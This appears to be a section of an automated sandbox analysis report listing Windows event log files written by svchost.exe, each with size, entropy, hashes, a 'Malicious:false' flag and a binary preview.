                            Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.0631557320109892
                            Encrypted:false
                            SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                            MD5:86AEA3A9CA3E5909FD44812754E52BD6
                            SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                            SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                            SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                            Malicious:false
                            Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.4467272005363894
                            Encrypted:false
                            SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                            MD5:155681C222D825199B738E8DEC707DC8
                            SHA1:704C800E7313F77A218203554E1428DF2819BC34
                            SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                            SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                            Malicious:false
                            Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.156155224835584
                            Encrypted:false
                            SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                            MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                            SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                            SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                            SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                            Malicious:false
                            Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.9197999988543422
                            Encrypted:false
                            SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                            MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                            SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                            SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                            SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                            Malicious:false
                            Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
                            Category:dropped
                            Size (bytes):76040
                            Entropy (8bit):4.551685398568497
                            Encrypted:false
                            SSDEEP:768:JLjpPv++M48PFVbUa+52j6LjpPv++M48PFVbUa+52jyY20sMY3Dp13/n/ydIxm6c:bU
                            MD5:D7FAC000E8F833A09029633F2D80D4F8
                            SHA1:54CAA6333B82E5D3FAB81C8614C971A0258C288D
                            SHA-256:E8A82460CEE168F5FDB02EA5C31E287F42BD9B165DB485F52E4D8CB55FFF16DA
                            SHA-512:03FCECA6B97282BA2D1BFEA3A494AE0E0EA0F1504B322BF931EACC1A3DB4FD7CAA3381EA1B257988DF88C3839D1F2E9D9363897A1CC7D5F8C97053833C74D2D6
                            Malicious:false
                            Preview:ElfFile.....................................................................................................................I..ElfChnk......................................$...(...il.....................................................................k...................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):75880
                            Entropy (8bit):5.700069043094079
                            Encrypted:false
                            SSDEEP:384:Bhka5a29o2KLzyzIz7a5QzuzNz0zxzuewKWMKYa5i0hka5a29o2KLzyzIz7a5Qze:BHk0HkAtWpSFNWuV6PfS7c
                            MD5:16CCF2E39D0F94601315CA4B84A958FA
                            SHA1:1EAB2C9C5BB4B15DAA500F9DCF120C0447C10287
                            SHA-256:BC75B1048966FEDFCBF30DB7715B195B22FE7478D53F9AB1747302C37D2DC891
                            SHA-512:41DC46939F1A741B2A9C4E3D14146165255ED7C4BCC030837B7B75A1B4C78B75A6BEF5D84DA49847B2921C4A1475EB025A098C0FA9FCB3347086D969A7E51425
                            Malicious:false
                            Preview:ElfChnk.A.......C.......A.......C............$..h(...v=........................................................................................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................%..........**......A...........1.............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9963080376858662
                            Encrypted:false
                            SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                            MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                            SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                            SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                            SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                            Malicious:false
                            Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.076996627399968
                            Encrypted:false
                            SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                            MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                            SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                            SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                            SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                            Malicious:false
                            Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.224121476511546
                            Encrypted:false
                            SSDEEP:384:ihhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGj:ihZxGp9b1
                            MD5:9B3B244C997316E5AAF45EE5357F8CB9
                            SHA1:7D7096D753E558A7A78A1BF2C48595AA6FEA4411
                            SHA-256:65242DABB1E89A773F64009609067D8EE68DD749EF4DAB2CDFC69381A588429D
                            SHA-512:C66504634D10769BADED620519A481FE86D08C75EB172967111DD0D0AB71D19DD01381FA6A0CCC0A12F57E77CACA0C3B06150DB765A8F5C38E069C0FF6747640
                            Malicious:false
                            Preview:ElfChnk.T...............T...................P...h....N.U....................................................................Q...........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.801423310886069
                            Encrypted:false
                            SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                            MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                            SHA1:542608204AF6B709B06807E9466F7543C0F08818
                            SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                            SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                            Malicious:false
                            Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.996272372482282
                            Encrypted:false
                            SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                            MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                            SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                            SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                            SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                            Malicious:false
                            Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):224288
                            Entropy (8bit):4.0578208166728915
                            Encrypted:false
                            SSDEEP:6144:KgfRTFgfRqggfRTFgfRq5gfR+EgfRXbgfR6QgfRTFgfRqR:H
                            MD5:DCAEFB4CFE6B5597E2695AE712E2F52C
                            SHA1:DA2755B33D3C77DB2079940CC731FFE2A4786DB5
                            SHA-256:1456AC5A3205834F62C107952CC079610EEF4188C02C66AE2ED9807B09321EEF
                            SHA-512:ADE8BEC992D50812CA2C3570A416AAA2B37E7B7A7F621054A3C1A837DE3650FE714C07BDEA6E76572BAD85197F70361F37B35E0DA490B6552C0715315A20A41E
                            Malicious:false
                            Preview:ElfChnk......................................i.. l..T.......................................................................................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................aj..............................................................................&...................................**.. 6..............1.............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.743586753696042
                            Encrypted:false
                            SSDEEP:768:GkN2cTOsKfIPHa4SAdRNlfhvd7NrjzDbRt:OcisgIPQAdRNlfhvd53R
                            MD5:977AF26CE27A3396A72725FBF098FB2F
                            SHA1:D6BCC1A9773B4A28E04298A757BE89325A07817E
                            SHA-256:373BFFB927967A5A8C5B30F9CAD4707946971F64C431877D0101572E7DFD692A
                            SHA-512:72A55A5A41072F32D7FC273FCD2E948949F834E17345F6964BF84963C1B1E6174003E5C52A5D49857701DB62AA9A6B8C617C4C14FB12F38D4880C40213BF20DB
                            Malicious:false
                            Preview:ElfChnk.........................................p............................................................................r..................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.7590316238843728
                            Encrypted:false
                            SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                            MD5:B074238315662886E2BD70106D08A747
                            SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                            SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                            SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                            Malicious:false
                            Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.7511849914008617
                            Encrypted:false
                            SSDEEP:1536:qXhPUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:qX5nS
                            MD5:7C35AE7799444BA51305F08470819182
                            SHA1:69F7281E876D4DDF12172D988F6A689E7B43CE79
                            SHA-256:24FC5B64AD7AACD89BD3111C8402AD478229733A1DC5238ABDA6002590904FC1
                            SHA-512:6725720CE21C9023BF6EF3CDC390095388EF33EE2973FE61DCC934B91750693191F3B680DED871CB38CB27B345F5C38F69FD667E270FD3011C35ADA07F3CB780
                            Malicious:false
                            Preview:ElfChnk.........%...............%............E..`G...X.S....................................................................B.!.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.3069197485541766
                            Encrypted:false
                            SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                            MD5:E6E4C860CE7DD1BB499D6A082B461B90
                            SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                            SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                            SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                            Malicious:false
                            Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:modified
                            Size (bytes):127536
                            Entropy (8bit):4.001162306513506
                            Encrypted:false
                            SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSqDh0w+qLpBVi7CPME79nCxkSqc5:c0w+qtBViW0w+qtBViD5
                            MD5:188278CD4E5CCB184C0D5C5F8AE14E5A
                            SHA1:06549039C676007C26084A2D86C9460F201A1DD6
                            SHA-256:0A93B55EEFDE1A64F92514B5F7FC43B8393E8009633C1E6F5D08FAE20FEB9035
                            SHA-512:99E813233D5753BDE4F01892146763060E6107D6EC9585FA655855825800A3C7A10B0DD21A24DBE8F18D2CC234CD72D3207B73842286B970FF1B4BEC88E129CE
                            Malicious:false
                            Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.2909571978750325
                            Encrypted:false
                            SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                            MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                            SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                            SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                            SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                            Malicious:false
                            Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.488768580471203
                            Encrypted:false
                            SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                            MD5:E3FB1708C64D250E4D801AFB8688DF35
                            SHA1:8B889F0358683733257411E451A86E3A1D42159D
                            SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                            SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                            Malicious:false
                            Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.497664742301162
                            Encrypted:false
                            SSDEEP:1536:9cRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20G8:9cRFkL1TWX0gkB/J7oasEfyk2/vKlqk0
                            MD5:39D50AC0A6FB19B10351B0B95864C553
                            SHA1:C3226D2043EC640AB3DEB9126CA837BB64C6267A
                            SHA-256:67DD28B8A168FBFC6E3CF184443D299D40E7DA612828E0E1106F57F9BF8CB794
                            SHA-512:345DA4736EEA092AD079D82232DB958C7CBA18B5D96805A81E2A31C7C8D442FE3715BCE5D69764C3AB0F71F94FA9416A3C2A363B228AF1A5A1A4EE9AF3AA9F62
                            Malicious:false
